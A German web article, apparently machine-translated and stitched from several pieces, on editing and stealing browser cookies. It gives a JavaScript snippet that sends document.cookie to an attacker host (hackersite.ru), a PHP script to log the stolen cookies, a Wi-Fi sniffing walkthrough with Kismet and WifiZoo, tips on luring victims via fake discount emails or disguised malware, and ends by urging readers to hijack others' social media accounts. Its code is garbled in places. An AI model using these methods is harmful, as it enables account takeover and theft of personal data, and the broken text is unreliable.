Wie kann ich Cookies ändern oder ersetzen?

Browserentwickler stellen keine integrierten Tools zum Bearbeiten von Cookies zur Verfügung. Sie können aber auch mit einem normalen Notizblock auskommen.


Schritt 1: Erstellen Textdatei mit Text

Windows-Registrierungseditor Version 5.00



@="C:\\IE_ext.htm"

Speichern Sie es unter dem Namen IE_ext.reg

Schritt 2: Fügen Sie mithilfe der erstellten Datei Änderungen zur Windows-Registrierung hinzu.

Schritt 3: Erstellen Sie eine Textdatei mit Text

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= „testname=testvalue; path=/; domain=testdomain.ru“;
Alert(external.menuArguments.document.cookie);


Speichern Sie es unter dem Namen C:\IE_ext.htm

Schritt 4: Wir gehen auf die Website, die uns interessiert.

Schritt 5: Klicken Sie mit der rechten Maustaste auf eine leere Stelle auf der Seite und wählen Sie den Menüpunkt aus „Arbeiten mit Cookies“. Erlauben Sie den Zugriff auf die Zwischenablage. Dein Cookie davon Webseite. Sie können ihren Notizblock einlegen und einen Blick darauf werfen.


Schritt 6: Um einige Cookies zu ändern, bearbeiten Sie die Datei C:\IE_ext.htm und ersetzen Sie sie Testname im Namen von Cookie, Testwert- über seine Bedeutung, testdomain.ru– zur Site-Domain. Fügen Sie bei Bedarf weitere ähnliche Zeilen hinzu. Zur einfacheren Kontrolle habe ich dem Skript die Ausgabe der aktuellen Cookies vor und nach der Änderung hinzugefügt: Alert(external.menuArguments.document.cookie);

Schritt 7: Führen Sie Schritt 5 erneut aus und aktualisieren Sie dann die Seite.

Fazit: Wir werden mit aktualisierten Cookies auf diese Internetressource zugreifen.

Wie stiehlt man Cookies mit JavaScript?

Gelingt es einem Angreifer, ein beliebiges JavaScript-Skript auf dem Computer des Opfers auszuführen, kann er die aktuellen Cookies sehr einfach auslesen. Beispiel:


var str= document.cookie;

Aber wird er sie auf seine Website übertragen können, da, wie ich bereits erwähnt habe, ein JavaScript-Skript ohne zusätzliche Bestätigung nicht auf eine Website zugreifen kann, die sich auf einer anderen Domain befindet? Es stellt sich heraus, dass ein JavaScript-Skript jedes Bild laden kann, das sich auf einem beliebigen http-Server befindet. Übertragen Sie gleichzeitig eventuelle Textinformationen der Download-Anfrage auf dieses Bild. Beispiel: http://hackersite.ru/xss.jpg?text_info Wenn Sie also diesen Code ausführen:

var img= neues Bild();

img.src= „http://hackersite.ru/xss.jpg?“+ encodeURI(document.cookie);


dann landet das Cookie in der Anfrage zum Herunterladen des „Bildes“ und „geht“ zum Angreifer.

Wie gehe ich mit solchen Anfragen um, ein „Bild“ herunterzuladen?

Ein Angreifer muss lediglich ein Hosting mit PHP-Unterstützung finden und dort Code wie diesen platzieren:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Dann werden alle Anfrageparameter für dieses Skript in der Datei gespeichert log.txt. Es bleibt nur noch das zuvor beschriebene JavaScript-Skript zu ersetzen http://hackersite.ru/xss.jpg zum Pfad zu diesem PHP-Skript.


Endeffekt

Ich habe nur die einfachste Möglichkeit gezeigt, XSS-Schwachstellen auszunutzen. Dies beweist jedoch, dass das Vorhandensein mindestens einer solchen Sicherheitslücke auf einer Mehrbenutzer-Internetseite es einem Angreifer ermöglichen kann, deren Ressourcen in Ihrem Namen zu nutzen.

Hallo, dieser kurze Artikel, eher eben Kurzbeschreibung Ich möchte mich widmen einfacher Weg Cookies abfangen Wi-Fi-Netzwerke. Ich werde Ihnen hier nicht sagen, was Cookies sind und warum sie benötigt werden, wenn eine Person daran interessiert ist, „Backwaren“ abzufangen; In einem drahtlosen Netzwerk sollte er meiner Meinung nach wissen, was es ist und warum er es braucht. Ich sage nur eines: Mithilfe dieser Dateien können Sie auf die Konten anderer Personen auf verschiedenen Websites zugreifen, bei denen Benutzer einen Authentifizierungsprozess durchlaufen müssen (z. B. mail.ru, vkontakte.ru usw.).

Also lasst uns anfangen. Zuerst müssen wir das drahtlose Netzwerk selbst finden, mit einem offenen Internet-Zugangs-Gateway, und es ist wünschenswert, dass dieses Netzwerk ziemlich viele Clients hat. Geeignet ist beispielsweise jedes Netzwerk in großen Einkaufszentren, Flughäfen und verschiedenen Cafés; an solchen Orten nutzen die Leute normalerweise WLAN-Zugang im Internet, zum Lesen von E-Mails, zum Überprüfen von Konten auf verschiedenen Dating-Sites, zum Anzeigen von LJ und verschiedenen Foren. Das ist alles genau das, was wir brauchen. Nachdem wir uns für die Wahl des Netzwerkstandorts entschieden und bestimmte Stunden der maximalen Anzahl von Clients untersucht haben, gehen wir direkt zu den Kampfeinsätzen über. Dafür benötigen wir einen Laptop mit WLAN-Adapter, und eine bestimmte Reihe von Programmen. In meinem Fall habe ich verwendet Acer-Laptop Aspire 3610, D-Link DWL G650 Client-WLAN-Karte und BackTrack3-Betriebssystem installiert.

Ich empfehle Ihnen, dieses Betriebssystem zu verwenden, da es bereits alle Programme enthält, die Sie möglicherweise benötigen, und der wichtigste Vorteil darin besteht, dass Sie Backtrack nicht auf Ihrem installieren müssen Festplatte, können Sie dieses Betriebssystem direkt von einer CD oder einem Flash-Laufwerk starten.

Kommen wir nun zur notwendigen Software. Ich habe Kismet zur Netzwerkerkennung und WifiZoo zum Abfangen von Cookies verwendet. Ich werde ausführlich auf das zweite Programm eingehen. WifiZoo ist ein passiver Funkwellenscanner und sammelt ziemlich viel nützliche Informationen, wie zum Beispiel: POP3, SMTP-Verkehr, http-Cookies/Authinfo, MSN, FTP-Anmeldeinformationen, Telnet-Netzwerkverkehr, NBT usw. Der einzige Nachteil dieses Programms ist das Fehlen eines Channel-Hopping-Modus, WifiZoo hört nur zu drahtlose Schnittstelle und kann sozusagen nicht von Kanal zu Kanal springen. Dieser Nachteil wird jedoch durch ein anderes Programm, Kismet, ausgeglichen, das diesen Modus unterstützt. Um WifiZoo zu starten, benötigen Sie:

  • Python
  • unheimlich
  • Kismet

Starten wir also das Programm, starten wir zunächst Kismet, um den Channel-Hopping-Modus zu unterstützen, und starten dann direkt WifiZoo. Das folgende Fenster sollte vor Ihnen erscheinen:

Jetzt müssen Sie nur noch warten, bis Sie etwas abfangen. Alles, was das Programm abfängt, finden Sie in den Protokollen, die sich im Verzeichnis mit dem Programm /logs/ befinden. Sie können auch eine GUI-Schnittstelle starten, die automatisch eine Verbindung zu http unter 127.0.0.1:8000 herstellt

Ich werde nicht über alle Funktionen dieses wunderbaren Programms schreiben, ich denke, Sie werden die anderen Funktionen selbst herausfinden, und da wir uns im Moment nur für Cookies interessieren. Klicken Sie auf den Link mit der Aufschrift „Cookies“ und sehen Sie, was wir abgefangen haben:

Möglichkeiten, Kekse zu stehlen

Diese Hacking-Methode, das Stehlen von Cookies, funktioniert hervorragend und wird von vielen Hackern verwendet. Wenn Sie es auch ausprobieren möchten, aber nicht wissen, was Sie tun sollen, lesen Sie unsere Empfehlungen.

Was sind Cookies?

Hierbei handelt es sich um Informationen über den Besuch eines Benutzers auf einer bestimmten Website. Es wird separat aufbewahrt Text dokument. Dort finden Sie vielfältige Informationen. Einschließlich Logins, Passwörter, Adressen Postfächer und Telefonnummern. Deshalb versuchen Einbrecher, an diese Dokumente zu gelangen. Um die benötigten Materialien zu stehlen, greifen Hacker auf unterschiedliche Methoden zurück.

Möglichkeiten, Kekse zu stehlen

XSS-Sicherheitslücke

Es kann auf jeder Website gefunden und verwendet werden. Wenn ein Spezialist eine Schwachstelle findet, setzt er sie um Sondercode. Je nach Verwendungszweck sind die Codes unterschiedlich; sie werden für eine bestimmte Ressource geschrieben. Wenn ein Benutzer diese Seite besucht und aktualisiert, werden alle Änderungen übernommen. Der Code beginnt zu wirken – er wird in den Computer des Opfers eingebettet und sammelt alles notwendige Informationen aus dem Browser.

Um Code einzuführen, können Sie jede Art von Schwachstelle nutzen – einen Fehler in einer Webressource, in einem Browser oder in einem Computersystem.

Es gibt zwei Arten von XSS-Angriffen:

Passiv - an das Seitenskript weitergeleitet. In diesem Fall müssen Sie nach Schwachstellen in Seitenelementen suchen. Zum Beispiel eine Dialogregisterkarte, ein Suchfeld, ein Videokatalog usw.

Aktiv - Sie sollten auf dem Server danach suchen. Sie sind besonders häufig in verschiedenen Foren, Blogs und Chats anzutreffen.

Wie kann man eine Person dazu zwingen, XSS anzuwenden?

Die Aufgabe ist nicht einfach, denn um den Code zu aktivieren, muss man oft auf den Link damit klicken. Sie können den Link maskieren und ihn zusammen mit einem interessanten Angebot per E-Mail versenden. Bieten Sie beispielsweise einen großen Rabatt in einem Online-Shop an. Das alles können Sie auch im Bild umsetzen. Der Benutzer wird es höchstwahrscheinlich sehen und nichts vermuten.

Installation eines Sniffers

Dies ist eine Implementierung Spezialprogramme um den Datenverkehr auf dem Gerät einer anderen Person zu überwachen. Mit dem Sniffer können Sie übertragene Sitzungen mit den Daten anderer Personen abfangen. Auf diese Weise können Sie alle Logins und Passwörter, Adressen usw. abrufen wichtige Informationen vom Benutzer über das Netzwerk übertragen werden. In diesem Fall werden Angriffe am häufigsten auf ungeschützte HTTP-Daten ausgeführt. Ungesichertes WLAN eignet sich hierfür gut.

Es gibt mehrere Möglichkeiten, einen Sniffer zu implementieren:

  • Datenverkehr kopieren;
  • Datenanalyse mittels Traffic-Attacken;
  • Abhören von Schnittstellen;
  • Einführung eines Sniffers in eine Kanalunterbrechung.
Ersatz von Cookies

Alle Daten werden in ihrer ursprünglichen Form auf dem Webserver gespeichert. Wenn Sie sie ändern, gilt dies als Ersatz. Alle erhaltenen Materialien können auf einem anderen Computer verwendet werden. Auf diese Weise haben Sie vollen Zugriff auf die persönlichen Daten des Benutzers. Sie können Cookies über Browsereinstellungen, Add-ons oder spezielle Programme ändern. Die Bearbeitung ist auch in jedem Standard-Notizblock am PC möglich.

Cookies mithilfe eines Virus stehlen

Experten raten davon ab, Cookies zu verwenden, es sei denn, es besteht ein besonderer Bedarf. Wenn es möglich ist, sie zu deaktivieren, ist es besser, dies zu tun. Dies liegt daran, dass Cookies sehr anfällig sind. Sie werden oft von Kriminellen gestohlen. Aus diesen Dateien können zahlreiche persönliche Informationen gewonnen werden. vertrauliche Informationen, die gegen eine Person verwendet wird. Die gefährlichste Art von Dateien sind diejenigen, die auf dem System verbleiben, nachdem die Sitzung bereits beendet ist.

Cookies werden häufig mithilfe eines Virenprogramms gestohlen. Das geht ganz einfach. In jedes sichere Dienstprogramm ist ein Virus eingebettet, der bestimmte Materialien auf dem Computer sammelt. Das Virenprogramm wird mit dem Server seines Besitzers verbunden. Das Programm muss so konfiguriert sein, dass der Browser es als Proxyserver verwendet.

Sobald das Programm den PC des Opfers erreicht, beginnt es automatisch damit, alle gespeicherten Daten zu sammeln und an Sie zu senden.

Viren sind unterschiedlich, ihre Funktionen können sich auch unterscheiden. Bei einigen können Sie den Browser vollständig steuern und alle Informationen anzeigen. Andere sind in der Lage, geschützte Materialien zu stehlen. Wieder andere sammeln nur ungesicherte Daten.

Möglicherweise haben Sie Schwierigkeiten, ein Virenprogramm auf den Computer einer anderen Person einzuschleusen. Es ist notwendig, den Benutzer zu zwingen, es herunterzuladen und auszuführen. Hier können Sie ihm entweder einen Brief mit einem Link zum Programm schicken oder das Programm als sicher ausgeben und darauf warten, dass die Person es von Ihrer Website herunterlädt.

Wie schützt man Cookies vor Diebstahl?

Die meisten Webressourcen sind nicht ausreichend geschützt. Hacker finden auf diesen Plattformen leicht Schwachstellen und Fehler.

Cookie-Schutzregeln:

  1. Verknüpfen Sie die Computer-ID mit der aktuellen Sitzung. Wenn Sie sich dann über ein Drittgerät auf der Website anmelden, wird eine neue Sitzung gestartet und die Daten der vorherigen Sitzung werden nicht abgerufen.
  2. Verknüpfen Sie die Sitzung mit dem Browser. Es funktioniert das gleiche Prinzip wie im vorherigen Absatz.
  3. Über das Netzwerk gesendete Parameter verschlüsseln. Dann sind die im Dokument gespeicherten Informationen nicht verständlich. Es wird für denjenigen nutzlos sein, der es abgefangen hat. Diese Technik schützt Sie nicht zu 100 %; einige Spezialisten können alle Materialien entschlüsseln.
  4. Erstellen Sie einen separaten Ordner für Bezeichner.

Wie finde ich mithilfe von Cookies das Passwort für das Konto einer anderen Person heraus?

Um an die Anmeldedaten einer anderen Person zu gelangen, müssen Sie zunächst zu der Datei gelangen, in der diese gespeichert wurden.

Für diejenigen, die es verwenden Mozilla Firefox Sie müssen zur Registerkarte „Extras“ gehen, die sich im Hauptmenü befindet. Als nächstes finden Sie in den Systemeinstellungen den Bereich „Schutz“, in dem Sie alle wichtigen Informationen zu Konten in sozialen Netzwerken suchen sollten. Alle Passwörter sind ausgeblendet, klicken Sie also auf die Schaltfläche „Anzeigen“. Sie können den Schutz sofort installieren und einen speziellen Code eingeben. Dann wird niemand außer Ihnen diese Informationen erhalten.

In Opera sind nur Benutzernamen öffentlich zugänglich. Aber im Menü finden Sie einen Passwort-Manager und können alle auf Ihrem Computer gespeicherten Daten einsehen. Volle Liste steht im Manager. Um Zugriff auf Passwörter zu erhalten, müssen Sie eine zusätzliche Erweiterung installieren.

IN Google Chrome Alle diese Materialien können in den erweiterten Einstellungen angezeigt werden. Es gibt eine Registerkarte mit allen gespeicherten Cookies.

Leider, Standardbrowser Internet Explorer verfügt nicht über solche Funktionen. Um Informationen über die Webplattformen herauszufinden, die der PC-Besitzer besucht, müssen Sie ein spezielles Programm herunterladen. Sie können es kostenlos im Internet finden, es ist völlig sicher, aber es ist besser, es von vertrauenswürdigen Quellen herunterzuladen. Vergessen Sie nicht, dass jedes Programm von einem Antivirenprogramm gescannt werden muss. Dies gilt insbesondere für Dienstprogramme, die mit Passwörtern arbeiten.

Diese Technik eignet sich nur für Personen, die physischen Zugriff auf den Computer des Opfers haben. Sie können auch das Passwort einer anderen Person herausfinden, wenn sich die Person über Ihren PC bei der Plattform angemeldet und ihre Daten gespeichert hat.

Programme zum Stehlen von Cookies

Es gibt viele Hacker-Foren im Internet, in denen Hacker miteinander kommunizieren. Die Leute gehen dorthin in der Hoffnung, kostenlose Hilfe zu bekommen. Dort finden Sie eine Vielzahl verschiedener Hacking-Programme. Wir möchten Sie warnen, dass Sie diesen Programmen nicht vertrauen sollten. Dienstprogramme zum Remote-Stehlen von Cookies vom Gerät einer anderen Person sind Attrappen oder Virenprogramme. Wenn Sie diese Software auf Ihren PC herunterladen, tappen Sie höchstwahrscheinlich in die Falle eines Betrügers. Betrüger veröffentlichen Programme kostenlos. Dadurch verbreiten sie Virensoftware und erlangen die Kontrolle über fremde PCs. Im Allgemeinen handelt es sich bei solchen Programmen um Betrug, das erkennen Sie an der Benutzeroberfläche und dem Inhalt. Wenn Sie eine Software zum Extrahieren von Dateien verwenden, sollten Sie es mit Sniffer-Programmen tun. Natürlich ist ihre Verwendung nicht so einfach. Und im Internet einen guten Schnüffler zu finden, ist nicht einfach. Aber solche Software gibt es bei Spezialisten, die sie Ihnen für Geld verkaufen können. Denken Sie daran, dass es viele Betrüger gibt, von denen jeder seine eigenen Tricks hat. Sie sollten nur vertrauenswürdigen Hackern vertrauen, die einen guten Ruf haben, über Bewertungen verfügen und über eine eigene Website verfügen.

Abschließend möchte ich darauf hinweisen, dass der Diebstahl von Cookies eine wirklich wirksame Methode ist, deren Wirksamkeit sehr hoch ist. Wenn Sie das Profil einer Person in einem sozialen Netzwerk oder Instant Messenger hacken möchten, sollten Sie diese Option unbedingt in Betracht ziehen. Diese Methode funktioniert am besten, wenn Sie den Computer des Opfers verwenden können. Es ist viel schwieriger, Materialien aus der Ferne zu beschaffen, aber Sie können unsere Tipps nutzen und versuchen, diese Methode in die Praxis umzusetzen.

Im Kapitel



 


Lesen:



„RosinterBank“: Einlagen, Kredite

Es wurde Ende der 80er Jahre vom Landwirtschaftsministerium der RSFSR gegründet und bedient Privat- und Firmenkunden. Seine Haupttätigkeit ist...

TV-Serie Medium Essenz, Kritik, über den Film TV-Serie Medium kaufen

TV-Serie Medium Essenz, Kritik, über den Film TV-Serie Medium kaufen

Kürzlich habe ich darüber nachgedacht, welche Blog-Plattform in Russland beliebt ist? Und es war nicht schwer, anhand der Statistiken eine Antwort auf diese Frage zu finden. In unserer...

So finden Sie heraus, mit wem jemand auf WhatsApp chattet

So finden Sie heraus, mit wem jemand auf WhatsApp chattet

Bei fast jedem Menschen entsteht regelmäßig der Wunsch, Korrespondenz in Instant Messengern oder sozialen Netzwerken zu lesen. Die Gründe dafür...

Stimmen auf Vkontakte: Was sie sind, wozu sie dienen und wo sie sich befinden

Stimmen auf Vkontakte: Was sie sind, wozu sie dienen und wo sie sich befinden

Die meisten fortschrittlichen Websites führen virtuelle Währungen für kommerzielle Zwecke ein. VKontakte ist keine Ausnahme. Benutzer streben danach,...

Feed-Bild RSS